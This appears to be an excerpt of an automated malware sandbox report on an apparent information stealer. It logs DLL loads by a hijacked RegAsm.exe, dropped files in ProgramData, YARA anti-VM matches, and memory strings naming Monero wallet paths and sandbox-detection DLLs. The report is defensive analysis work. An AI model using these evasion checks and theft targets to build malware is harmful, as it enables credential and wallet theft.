                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: .pdb ? source: file.exe
                          Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2827920795.000000003864F000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2821875809.000000002C764000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: .pdb source: 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.dr
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: ECBKKKFHCF.exe.3.drStatic PE information: real checksum: 0x68cd6 should be: 0x61c65
                          Source: file.exeStatic PE information: real checksum: 0x64c9d should be: 0x75c2b
                          Source: 66fe13d251bbf_lsod[1].exe.3.drStatic PE information: real checksum: 0x68cd6 should be: 0x61c65
                          Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                          Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042F142 push ecx; ret 3_2_0042F155
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00422D3B push esi; ret 3_2_00422D3D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041DDB5 push ecx; ret 3_2_0041DDC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C63B536 push ecx; ret 3_2_6C63B549
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0044ED93 push edx; ret 10_2_0044ED9B
                          Source: file.exeStatic PE information: section name: .text entropy: 7.996106599769484
                          Source: ECBKKKFHCF.exe.3.drStatic PE information: section name: .text entropy: 7.9954918101876205
                          Source: 66fe13d251bbf_lsod[1].exe.3.drStatic PE information: section name: .text entropy: 7.9954918101876205
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\ECBKKKFHCF.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fe13d251bbf_lsod[1].exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\ECBKKKFHCF.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 5888, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                          Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                          Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                          Source: RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL21:49:5921:49:5921:49:5921:49:5921:49:5921:49:59DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 1880000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 5190000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory allocated: 17B0000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory allocated: 5120000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_0040180D
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.3 %
                          Source: C:\Users\user\Desktop\file.exe TID: 5228Thread sleep count: 308 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 6224Thread sleep count: 104 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 2348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exe TID: 6368Thread sleep count: 311 > 30Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exe TID: 6368Thread sleep count: 102 > 30Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exe TID: 3620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3516Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 6224Thread sleep count: 84 > 30Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
